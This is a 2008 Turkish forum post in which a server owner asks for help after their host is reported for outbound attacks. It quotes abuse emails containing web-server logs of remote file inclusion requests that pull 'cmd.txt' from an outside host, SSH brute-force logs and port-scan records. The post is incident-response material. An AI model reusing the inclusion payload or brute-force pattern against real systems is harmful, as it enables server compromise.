Konu: Sucumdan dışarı saldırı varr yardım lütfen :S
Tekil Mesaj gösterimi
  #1 (permalink)  
Alt 12.03.08, 04:59 PM
nbbh nbbh isimli Üye şimdilik offline konumundadır
Sempron
  
Üyelik tarihi: Feb 2008
Mesajlar: 25
Tecrübe Puanı: 0
nbbh is on a distinguished road
Unhappy Sucumdan dışarı saldırı varr yardım lütfen :S
arkdaşlar daha önce de belirtmiştim sunucumdan dışarı saldırı , buyrun gelen mailler ve loglar.;

herkese yardımları içinteşekkürler.

suncu ip miz : 89.149.254.31

Kod:
Mit freundlichen Grüßen / Best regards
Thomas Turnwald
 
Bitte senden Sie den eMail-Verlauf immer mit!
Please resend the eMail-history!
 
netdirekt e. K.
Kleyerstrasse 79  / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
 
Registernummer: HRA 30056,
Gericht: Amtsgericht Frankfurt/Main
Inhaber: Wiethold Wagner
 
----- Original Message ----- 
From: "Helmut Hullen" <Hullen@t-online.de>
To: <info@netdirekt.de>
Sent: Tuesday, March 11, 2008 10:37 PM
Subject: seltsame Abfragen
 
 
> Sehr geehrte Damen und Herren,
>
> in den Log-Dateien einer von mir betreuten Webseite fand ich u.a.
>
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
> //include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? 
> HTTP/1.1" 403 351 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
>
/stabil//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.
txt? 
> HTTP/1.1" 403 358 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
>
/stabil/Updates//include/doc/get_image.php?lang=&img=http://mos1.altervista.
org/cmd.txt? 
> HTTP/1.1" 403 366 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] 
> "GET 
>
/doc//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt
? 
> HTTP/1.1" 403 355 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] 
> "GET 
>
/doc/ods-v36//include/doc/get_image.php?lang=&img=Sito in costruzione
/cmd.txt? 
> HTTP/1.1" 403 363 "-" "libwww-perl/5.808"
>
> Die Einträge sind typisch für die Versuche eines bösartigen Programms.
> Könnten Sie bitte erforschen, welcher Ihrer Rechner die Anfragen
> abgesetzt hat und ob er von einem Schadprogramm befallen ist? Danke!
>
> Viele Gruesse!
> Helmut Hullen
> Wendenmaschstr. 8
> 38114 Braunschweig
> Tel. 0531-34 11 26
>
-------------------------------------------------------------------------

Kod:
SSH attack
 
NTP sync'd to GMT -5
 
Begin forwarded message:
 
> smtptoaster.midasnetworks.com login failures:
> Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:25 smtptoaster sshd[69285]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:27 smtptoaster sshd[69287]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:28 smtptoaster sshd[69289]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:31 smtptoaster sshd[69293]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:32 smtptoaster sshd[69295]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:34 smtptoaster sshd[69297]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:35 smtptoaster sshd[69299]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:36 smtptoaster sshd[69301]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:38 smtptoaster sshd[69303]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:39 smtptoaster sshd[69305]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:41 smtptoaster sshd[69307]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:42 smtptoaster sshd[69309]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:46 smtptoaster sshd[69315]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:47 smtptoaster sshd[69317]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:49 smtptoaster sshd[69319]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:50 smtptoaster sshd[69321]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:52 smtptoaster sshd[69323]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:53 smtptoaster sshd[69325]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:54 smtptoaster sshd[69327]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:56 smtptoaster sshd[69329]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:57 smtptoaster sshd[69331]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:21:58 smtptoaster sshd[69333]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:00 smtptoaster sshd[69335]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:01 smtptoaster sshd[69350]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:03 smtptoaster sshd[69352]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:04 smtptoaster sshd[69354]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:05 smtptoaster sshd[69356]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:07 smtptoaster sshd[69358]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:08 smtptoaster sshd[69360]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:09 smtptoaster sshd[69362]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:11 smtptoaster sshd[69364]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:12 smtptoaster sshd[69366]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:13 smtptoaster sshd[69368]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:16 smtptoaster sshd[69372]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:18 smtptoaster sshd[69374]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:19 smtptoaster sshd[69376]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:20 smtptoaster sshd[69378]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:22 smtptoaster sshd[69380]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:23 smtptoaster sshd[69382]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:24 smtptoaster sshd[69384]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:26 smtptoaster sshd[69386]: Invalid user user1 from  
> 89.149.254.31
> Mar 10 01:22:27 smtptoaster sshd[69388]: Invalid user user from  
> 89.149.254.31
> Mar 10 01:22:29 smtptoaster sshd[69390]: Invalid user user from  
> 89.149.254.31
> Mar 10 01:22:30 smtptoaster sshd[69392]: Invalid user user from  
> 89.149.254.31
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner
---------------------------------------------------------------------------------

Kod:
-------- Original-Nachricht --------
Betreff: (b2911274)Network scan from 89.149.254.31 (repeat offender)
Datum: Wed, 12 Mar 2008 10:49:48 +0000 (GMT)
Von: secmbox3@verizonbusiness.com
Antwort an: secmbox3@verizonbusiness.com
An: abuse@netdirekt.de, abuse@unix-server.com, abuse@gblx.net
 
You are receiving this message because you are on the contact list for
89.149.254.31.  This message has been sent to abuse@netdirekt.de,
abuse@unix-server.com,  abuse@gblx.net.  At this time, this message is
for informational use only.
 
We detected a scan of part of the Verizon Business Public IP network
which appears to have originated from the source address 89.149.254.31
(89-149-254-31.internetserviceteam.com).  There have been 1 previous
offenses by this IP.  While dynamic addressing prevents us from being
able to say whether it was the same individual each time, it could be an
indication of a more serious problem.  The scanning began at
approximately 2008-03-11 02:27:42 UTC.  If neither you nor the owner of
this address are aware of this traffic, it is possible that a third
party is either forging the source address or executing an unauthorized
scan from this machine.  If you suspect the scan is being executed by an
unauthorized third party, a trojan, or a virus, please consult
http://www.cert.org/tech_tips/root_compromise.html.
 
This address attempted to scan approximately 1960 addresses on TCP/22.
 
This is a violation of Verizon Business's acceptable use policy.  For
further information, please consult: http://global.mci.com/terms/a_u_p/.
 A reply to this message is not required, but the activity above must be
stopped.  If you need to contact us about this issue, please reply to
this message leaving the ticket number in the subject line.
 
Thank you
 
Verizon Business Infrastructure/Network Security Team
 
Sample of log entries:
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.78:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.76:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.79:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.220:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.223:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.221:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.209:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.211:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.217:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.208:22,tcp
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner
-----------------------------------------------------------------------------------

Kod:
-------- Original-Nachricht --------
Betreff: Incident ID: BRT488159 Sent to info@netdirekt.de
Datum: Wed, 12 Mar 2008 08:32:14 UT
Von: soc@brasiltelecom.com.br
An: info@netdirekt.de
CC: cert@cert.br
 
Dear Sirs,
 
   It was detected on Brasil Telecom's monitoring systems that the
 machine listed in this mail has been maliciously used. The traffic
details are
below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.
 
   Therefore the IP 89.149.254.31 will be blocked on all our Data
Centers for 60 minutes.
 
   To reply this e-mail, please keep the ID BRT488159 in the Subject Field.
 
Thanks,
 
CSIRT Brasil Telecom
 
 
2008-03-12 08:23:57 GMT
 
89.149.254.31 1:2002889 SSH Brute Force Attempt
 
 
Prezados responsaveis,
 
   Foi identificado atraves da monitoracao de seguranca da Brasil
Telecom que a maquina listada abaixo esta sendo usada para fins
maliciosos na Internet (Note que a data esta no seguinte formato:
AAAA-MM-DD HH:MM:SS). Favor tomar as acoes cabiveis em relacao ao
Incidente.
 
   Em virtude disso o IP 89.149.254.31 ficara 60 minutos bloqueado em
todos os nossos Data centers.
 
   Ao responder este e-mail mantenha o ID BRT488159 no campo assunto.
 
Att,
 
Brasil Telecom CSIRT
 
---
Esta mensagem foi enviada automaticamente pelo SOC - Centro de Operacoes
de Seguranca da Brasil Telecom S.A. e pode conter informacoes
privilegiadas e/ou de carater confidencial, nao podendo ser
retransmitida. Caso mais esclarecimentos ou acoes por parte da equipe de
Resposta a Incidentes de Seguranca sejam necessarios, favor contactar o
SOC no telefone +55(61)3305-5565 (atendimento 24x7), ou pelo e-mail
soc.nivel1@brasiltelecom.com.br.
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner
Alıntı ile Cevapla